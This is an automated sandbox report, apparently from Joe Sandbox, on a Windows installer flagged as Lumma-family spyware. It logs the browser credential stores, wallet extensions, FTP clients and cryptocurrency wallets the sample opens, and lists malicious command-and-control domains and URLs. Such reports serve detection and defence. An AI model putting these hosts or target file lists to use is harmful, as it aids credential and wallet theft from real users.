        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior

        Remote Access Functionality

        Source: Yara match, File source: sslproxydump.pcap, type: PCAP
        Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
        Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
        Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
        Execution: 131 Windows Management Instrumentation; 1 Native API; 1 Command and Scripting Interpreter; 2 PowerShell; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
        Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
        Privilege Escalation: 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 12 Process Injection; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
        Defense Evasion: 11 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 111 Masquerading; 231 Virtualization/Sandbox Evasion; 12 Process Injection; Indicator Removal from Tools
        Credential Access: 2 OS Credential Dumping; 11 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
        Discovery: 1 System Time Discovery; 13 File and Directory Discovery; 235 System Information Discovery; 531 Security Software Discovery; 3 Process Discovery; 231 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 System Owner/User Discovery
        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
        Collection: 1 Archive Collected Data; 41 Data from Local System; 11 Input Capture; 1 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
        Command and Control: 1 Ingress Tool Transfer; 11 Encrypted Channel; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
        Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
        [Behavior graph. ID: 1584737, Sample: Setup.exe, Start date: 06/01/2025, Architecture: WINDOWS, Score: 100]

        Source | Detection | Scanner | Label
        Setup.exe | 8% | Virustotal | -
        Setup.exe | 0% | ReversingLabs | -

        Source | Detection | Scanner | Label
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com | 0% | ReversingLabs | -
        C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe | 78% | ReversingLabs | Win32.Spyware.Lummastealer
        C:\Users\user\AppData\Local\Temp\is-320VG.tmp\_isetup\_isdecmp.dll | 0% | ReversingLabs | -
        C:\Users\user\AppData\Local\Temp\is-320VG.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | -
        C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp | 0% | ReversingLabs | -
        C:\Users\user\AppData\Local\Temp\is-IRCRU.tmp\_isetup\_isdecmp.dll | 0% | ReversingLabs | -
        C:\Users\user\AppData\Local\Temp\is-IRCRU.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | -
        C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp | 0% | ReversingLabs | -
        C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy) | 8% | ReversingLabs | -
        C:\Users\user\AppData\Roaming\ColorStreamLib\is-STFPD.tmp | 8% | ReversingLabs | -
        No Antivirus matches
        No Antivirus matches
        Source | Detection | Scanner | Label
        https://dfgh.online/invoker.php?compName=user-PC | 100% | Avira URL Cloud | malware
        yokesandusj.sbs | 0% | Avira URL Cloud | safe
        https://yokesandusj.sbs/api | 0% | Avira URL Cloud | safe
        http://michaeluno.jp/H | 0% | Avira URL Cloud | safe
        https://jrsoftware.org0 | 0% | Avira URL Cloud | safe
        https://jrsoftware.org/ | 0% | Avira URL Cloud | safe
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        cegu.shop | 185.161.251.21 | true | false | - | high
        yokesandusj.sbs | 104.21.44.159 | true | true | - | unknown
        default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 217.20.57.18 | true | false | - | high
        klipvumisui.shop | 172.67.208.58 | true | false | - | high
        iqEcklosdyCxilSwLDOcKOPdDDq.iqEcklosdyCxilSwLDOcKOPdDDq | unknown | unknown | false | - | unknown
        dfgh.online | unknown | unknown | false | - | high
        Name | Malicious | Antivirus Detection | Reputation
        yokesandusj.sbs | true | Avira URL Cloud: safe | unknown
        https://klipvumisui.shop/int_clp_sha.txt | false | - | high
        rabidcowse.shop | false | - | high
        wholersorie.shop | false | - | high
        https://yokesandusj.sbs/api | true | Avira URL Cloud: safe | unknown
        cloudewahsj.shop | false | - | high
        noisycuttej.shop | false | - | high
        nearycrepso.shop | false | - | high
        https://cegu.shop/8574262446/ph.txt | false | - | high
        framekgirus.shop | false | - | high
        tirepublicerj.shop | false | - | high
        abruptyopsn.shop | false | - | high
                                                                                                                                                                          high
                                                                                                                                                                          http://michaeluno.jp/BrightLib.exe, 00000031.00000000.3070273332.0000000000AEE000.00000002.00000001.01000000.0000000F.sdmp, BrightLib.exe, 00000031.00000002.3111411093.0000000001050000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000031.00000002.3111928278.0000000003370000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000031.00000002.3112485410.00000000063F8000.00000004.00000020.00020000.00000000.sdmp, is-STFPD.tmp.22.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://ocsp.securetrust.com/0?T0VC3MU5SNNFXQB43V5.exe.13.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=M.com, 0000000D.00000003.2442381109.00000000045D0000.00000004.00000800.00020000.00000000.sdmp, M.com, 0000000D.00000003.2442531809.0000000004744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.44.159 | yokesandusj.sbs | United States | 13335 | CLOUDFLARENETUS | true
185.161.251.21 | cegu.shop | United Kingdom | 5089 | NTLGB | false
172.67.208.58 | klipvumisui.shop | United States | 13335 | CLOUDFLARENETUS | false
                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                Analysis ID:1584737
                                                                                                                                                                                Start date and time:2025-01-06 12:15:11 +01:00
                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                Overall analysis duration:0h 8m 54s
                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                Report type:full
                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                Number of analysed new started processes analysed:50
                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                Technologies:
                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                Sample name:Setup.exe
                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@84/35@5/3
                                                                                                                                                                                EGA Information:
                                                                                                                                                                                • Successful, ratio: 33.3%
                                                                                                                                                                                HCA Information:
                                                                                                                                                                                • Successful, ratio: 51%
                                                                                                                                                                                • Number of executed functions: 48
                                                                                                                                                                                • Number of non-executed functions: 41
                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.95.31.18, 52.165.164.15, 13.107.246.45
